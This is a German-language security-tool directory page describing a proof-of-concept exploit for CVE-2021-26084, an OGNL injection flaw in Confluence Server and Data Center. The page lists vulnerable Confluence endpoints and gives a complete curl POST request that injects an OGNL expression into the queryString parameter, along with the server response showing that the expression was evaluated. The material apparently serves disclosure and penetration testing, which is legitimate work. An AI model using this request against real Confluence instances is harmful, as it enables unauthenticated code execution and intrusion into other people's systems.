Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-26084_PoC — Proof-of-Concept-Exploit für CVE-2021-26084, eine OGNL-Injection-Schwachstelle in Confluence Server und Data Center, der eine nicht authentifizierte Remote-Codeausführung demonstriert. | Kitploit
Tools/GitHubGitHub/alt3kx/cve-2021-26084_poc
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

Proof-of-Concept-Exploit für CVE-2021-26084, eine OGNL-Injection-Schwachstelle in Confluence Server und Data Center, der eine nicht authentifizierte Remote-Codeausführung demonstriert.

Repository anzeigen
531648vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL-Injection

Es besteht eine OGNL-Injection-Schwachstelle, die es einem authentifizierten Benutzer und in einigen Fällen auch einem nicht authentifizierten Benutzer ermöglicht, beliebigen Code auf einer Confluence Server- oder Data Center-Instanz auszuführen.

poc

Mein Kampf, um die Einstiegspunkte und Injections zu finden XD

Kampf (1)Kampf (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

Schließlich wurden Confluence-Einstiegspunkte ausgenutzt

root@kitploit:~
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

Meine erste manuelle Inspektion: Hinweis: Vorauthentifizierter Benutzer

root@kitploit:~
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Server Response: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

Referenzen:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

Tolle Ausarbeitung hier veröffentlicht:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Einige sehr nützliche Hinweise von:
@wvuuuuuuuuuuuuu
@iamnoooob

Autor

Alex Hernandez aka (@_alt3kx_)

Tool herunterladen